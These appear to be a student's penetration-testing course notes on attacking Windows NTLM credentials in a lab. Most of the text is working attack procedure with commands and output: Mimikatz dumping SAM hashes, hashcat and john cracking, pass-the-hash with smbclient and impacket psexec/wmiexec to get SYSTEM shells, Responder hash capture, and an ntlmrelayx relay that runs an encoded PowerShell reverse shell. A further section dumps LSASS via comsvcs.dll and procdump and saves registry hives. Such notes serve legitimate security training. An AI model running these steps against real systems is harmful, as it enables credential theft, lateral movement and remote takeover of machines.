
# NTLM

Creds are not only stored when users log into a Win system but also when a service is run with a user acct. 

### SAM
Windows stores hashed user passwords in the Security Account Manager (SAM) database file, which is used to authenticate local or remote users.
- **C:\\Windows\\system32\\config\\sam**

### LSASS
LSASS is a process in Windows that handles user authentication, password changes, and access token creation.
- Local Security Authority Subsystem
- Runs under the SYSTEM user
- Caches NTLM hashes and other creds
- Can be attacked with Mimikatz's *sekurlsa* module


> To deter offline SAM database password attacks, Microsoft introduced the SYSKEY feature in Windows NT 4.0 SP3, which partially encrypts the SAM file. The passwords can be stored in two different hash formats: LAN Manager (LM) and NTLM. LM is based on DES, and is known to be very weak. For example, passwords are case insensitive and cannot exceed fourteen characters. If a password exceeds seven characters, it is split into two strings, each hashed separately. LM is disabled by default beginning with Windows Vista and Windows Server 2008.

NTLM addresses weaknesses of LM passwords:  They are case sensitive, can be longer than 14 characters, aren't split into smaller parts, etc
- But still NOT salted.

Can't copy, rename, or move SAM while OS is operating as the kernel keeps a file system lock on it.
- (which... idk, check?  'cause I've copied the sam plenty during poc testing)

Mimikatz provides the functionality to extract plain-text passwords and password hashes from various sources in Windows and leverage them in further attacks like pass-the-hash. Mimikatz also includes the *sekurlsa* module, which extracts password hashes from the LSASS process memory.

As LSASS runs under SYSTEM user, Mimikatz must run under Admin user and have the *SeDebugPrivilege* access right enabled
- Can elevate privs to SYSTEM with [**psexec**](Tools.md#psexec) or Mimikatz's _token elevation function_
	- *token elevation function* requires the *SeImpersonatePrivilege* access right to work, but all local administrators have it by default.


Other hash dumping tools, including **pwdump**, **fgdump**, & **Windows Credential Editor** (**wce**), work well against older Windows os' like Windows XP and Windows Server2003.

# Cracking with Mimikatz
- Requires Administrator privileges
- For unprivileged users see [Net-NTLMv2](15.2%20-%20PW%20Hashes.md#Net-NTLMv2)


Grab SAM hashes from MARKETINGWK01 workstation

- RDP in
- Check with users exist locally on the machine (run PS as Admin)
```powershell
Get-LocalUser
	Name               Enabled Description
	----               ------- -----------
	Administrator      False   Built-in account for administering the computer/domain
	DefaultAccount     False   A user account managed by the system.
	Guest              False   Built-in account for guest access to the computer/domain
	nelly              True
	offsec             True
	sam                True
	WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...
```

- Goal:  Get hash/ pw of user *nelly*
```powershell
cd C:\Tools

.\mimikatz.exe
```
Each command consists of a module and a command delimited by two colons
- One of the most common Mimikatz commands is **sekurlsa::logonpasswords**
	- Attempts to extract plaintext passwords and password hashes from all available sources.
	- Generates a lot of results
- Instead use **lsadump::sam**
	- Extracts the NTLM hashes from the SAM
	- Need to use **token::elevate** to elevate privs to SYSTEM

```powershell
mimikatz # privilege::debug  
	Privilege '20' OK  
  
mimikatz # token::elevate  
	Token Id  : 0
	User name :
	SID name  : NT AUTHORITY\SYSTEM
	
	660     {0;000003e7} 1 D 41645          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
	 -> Impersonated !
	 * Process Token : {0;000d1f90} 2 F 3015677     MARKETINGWK01\offsec    S-1-5-21-4264639230-2296035194-3358247000-1001  (14g,24p)       Primary
	 * Thread Token  : {0;000003e7} 1 D 3090039     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)
  
mimikatz # lsadump::sam  
	Domain : MARKETINGWK01
	SysKey : 2a0e15573f9ce6cdd6a1c62d222035d5
	Local SID : S-1-5-21-4264639230-2296035194-3358247000
	
	SAMKey : 38e2cdfccc1d5220e001dd7d9b6186b3
	...
	RID  : 000003e9 (1001)
	User : offsec
	  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
	...
	RID  : 000003ea (1002)
	User : nelly
	  Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10
```

- Copy hash over to Kali for cracking
```bash
# Copy hash
echo 3ae8e5f0ffabb3a627672e1600f1ba10 > nelly.hash

# Retrieve correct hash mode
hashcat -h | grep -i "ntlm"                        
   5500 | NetNTLMv1 / NetNTLMv1+ESS                                  | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                             | Network Protocol
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
   1000 | NTLM                                                       | Operating System     <-- Will use this

# Use hashcat w/ rockyou.txt & best64.rule set
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
	3ae8e5f0ffabb3a627672e1600f1ba10:nicole1                  
      
	Session..........: hashcat
	Status...........: Cracked

# Test nelly:nicol1 connection via RDP
xfreerdp /cert-ignore /compression /auto-reconnect /u:nelly /p:nicole1 /v:192.168.201.210
```


# Pass-the-Hash
Potential tools to use
- [smbclient](Tools.md#smbclient)
- [CrackMapExec](Tools.md#CrackMapExec)
- [impacket_](Tools.md#impacket_)
- [psexec.py](Tools.md#psexec.py)
- [wmiexec.py](Tools.md#wmiexec.py)

NTLM/LM password hashes are not salted and remain static between sessions
- Can use a discovered hash to not only authenticate to that target, but to another target as well
	- Second target needs an account with the same username and password
	- Also needs administrative privileges on the second target for code execution
- Need local *Administrator* user's hash
	- *UAC Remote Restrictions* are enabled by default and prevents software and commands from running w/ Admin rights from remote systems.
		- Mitigates PtH for users in the local administrator group aside from the local _Administrator_ account.


Assume already gained access to **FILES01** and obtained the password (password123!) for the *gunther* user.
Want to extract the Administrator's NTLM hash and use it to authenticate to the **FILES02** machine.
The goal is to gain access to a restricted SMB share (**\\\\192.168.50.212\\secrets**)and leverage pass-the-hash to obtain an interactive shell on **FILES02**.

- Grab NTLM hash of Administrator
```powershell
cd C:\Tools
.\mimikatz.exe

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
	...
	-> Impersonated !

mimikatz # lsadump::sam
	Domain : FILES01
	SysKey : 509cc0c46295a3eaf4c5c8eb6bf95db1
	Local SID : S-1-5-21-1555802299-1328189896-734683769
	
	SAMKey : 201b0e3078f2be635aaaa055ab5a7828

	RID  : 000001f4 (500)
	User : Administrator
	  Hash NTLM: 7a38310ea6f0027ee955abed1762964b
	  
	RID  : 000003ef (1007)
	User : paul
	  Hash NTLM: 57373a907ccd7196a2bad219132d615f

	RID  : 000003f0 (1008)
	User : files02admin
  Hash NTLM: e78ca771aeb91ea70a6f1bb372c186b6
```

Next, need tools that support passing NTLM hashes


### SMB
For SMB enumeration and management
- Use **smbclient** or **CrackMapExec**
- For command execution, we can use the scripts from the **impacket** library like *psexec.py* and *wmiexec.py*.

Can PtH to other protocols like **RDP** and *WinRM*, if the user has the required rights.

We can also use **Mimikatz** to conduct pass-the-hash as well.

- Attempt SMB access
```bash
smbclient \\\\192.168.201.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
	smb: \> dir
	  .                                   D        0  Thu Jun  2 16:55:37 2022
	  ..                                DHS        0  Fri Apr  5 14:58:35 2024
	  secrets.txt                         A       16  Thu Sep  1 12:23:32 2022

                4554239 blocks of size 4096. 1599027 blocks available
	smb: \> get secrets.txt
	getting file \secrets.txt of size 16 as secrets.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
	smb: \> exit

cat secret.txt
	this is a secret
```

### Interactive Shell

Use *impacket's* **psexec.py**
- Similar to *SysInternals* PsExec
- Searches for a writable share and uploads an executable file to it.
- Registers the executable as a Windows service and starts it.
	- Desired result is often to obtain an interactive shell or code execution.

```bash
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.201.212
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.201.212
```
- Due to the nature of _psexec.py_, we'll always receive a shell as SYSTEM instead of the user we used to authenticate.



# Net-NTLMv2
- aka NTLMv2
- Protocol responsible for authenticating for Win clients & servers over a network.
- Less secure than *Kerberos* protocol
	- Still in use as majority of Win env have older devices that may not support Kerberos

### Basics of authentication process
- Send the server a request outlining the connection details to access the (for example) SMB share
- Server will send a challenge
- NTLM hash (& other data) is encrypted and sent as a response to prove identity
- Server will check challenge response and either grant or deny access accordingly.

### Abuse
- Need target to start an auth process using Net-NTLMv2 against a system we control
- Need to prepare our system so that it handles the auth process and shows us the Net-NTLMv2 hash the target used to auth

**[Responder](Tools.md#Responder)** includes a built-in SMB server that handles the auth process and prints all captures Net-NTMLv2 hashes
- Includes HTTP, FTP, and LLMNR as well)


> **If we have code execution on a remote system, can force it to auth with us by connecting it to our prepared SMB server**>
> - **IE:   Responder is listening in kali;  in victim we run `ls \\<our IP>\share` in PowerShell**
>
> **If no code execution, can try other vectors**
> - **IE:   Discovered a file upload form in a web app on a Win Server, can try to enter a non-existing file w/ a UNC path like `\\<our IP>\share\nonexistent.txt`**
	- **Assuming web app supports uploads via SMB, the server with auth to our SMB server**


# Relay Attack

In a relay attack, an attacker sends an auth request to a server and “relays” the challenge to a target, so the target thinks the attacker is the legit server.
The target Responds to the attacker who then “relays” it back to the server, so the server thinks that the attacker is the target machine.

Useful when a Net-NTLMv2 hash is too difficult to crack.

Assume we have reverse shell access on FILES01 endpoint/ server as an unprivileged user (*files02admin*).  Rather than capturing the user's hash during authentication, we'll forward it to FILES02 in a lateral movement relay attack.
Also assume that *files02admin* is a local user on the FILES02 machine, thereby granting us access.
Furthermore, if they're in the Administrators group, we can use it to authenticate and then execute commands over SMB with methods similar to those used by [psexec](Tools.md#psexec.py) or [wmiexec](Tools.md#wmiexec.py)

> In this example we don't use the local _Administrator_ user for the relay attack as we did for the pass-the-hash attack. Therefore, the target system needs to have UAC remote restrictions disabled or the command execution will fail.
> If UAC remote restrictions are enabled on the target then we can only use the local _Administrator_ user for the relay attack.


## Flow of attack

1. Connect to a server (FILES01) - either bind or reverse bind shell
2. Open up nc listener for reverse shell
3. Use [impacket_ntlmrelayx](Tools.md#ntlmrelayx) to capture connection's authorization and relay the authorization to the second server (FILES02) along with a base64 encoded PS reverse shell
   
```bash
impacket-ntlmrelayx --no-http-server -smb2support -t <FILES02-ip> -c "powershell -enc JABjAGwAaQBlAG4AdA...=="
``` 



# Removed from course
### Finding lsass PID
```powershell
tasklist /fi "imagename eq lsass.exe"
```

### comsvcs.dll
```powershell
ps C:\windows\system32> .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
```

### procdump.exe
```powershell
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

### reg.exe
```powershell
reg save hklm\sam <directory-to-save>\sam
reg save hklm\system <directory-to-save>\system
```


## Pass the Hash
  
Use **pth-winexe** from the Passing-The-Hash toolkit (a modified version of **winexe**), which performs auth using the SMB protocol.  
  
To execute an application like cmd on the remote computer using the SMB protocol, admin privileges are required due to auth'ing to the administrative share C$ and subsequent creation of a Windows service.  
  
  
Using the hash we just had dumped from **mimikatz.exe**:  
```bash
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd  
E_md4hash wrapper called.  
HASH PASS: Substituting user supplied NTLM HASH...  
Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>
```


Behind the scenes, the format of the NTLM hash we provided was changed into a NetNTLM version 1 or 2 format during the auth process.  

We can capture these hashes using MITM or poisoning attacks & either crack them or relay them.  
  
For example, some apps like IE and Windows Defender use the Web Proxy Auto-Discovery Protocol (WPAD) to detect proxy settings.  

If we are on the local network, we could poison these requests and force NetNTLM auth with a tool like _Responder.py_,  
	which creates a rogue WPAD server designed to exploit this security issue.  
Since poisoning is highly disruptive to other users, tools like Responder.py should never be used in the labs.  
  


### PW Cracking

Brute forcing w/ [john](Tools.md#John%20the%20Ripper):  
```bash
cat hash.txt  
WDAGUtilityAccount:0c509cca8bcd12a26acf0d1e508cb028  
Offsec:2892d26cdf84d7a70e2eb3b9f05c425e  
  
sudo john hash.txt --format=NT  
Using default input encoding: UTF-8  
Rules/masks using ISO-8859-1  
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
```


Linux:  
```bash
sudo unshadow /etc/passwd /etc/shadow > unshadowed.txt  
  
john --rules --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadowed.txt
```

  
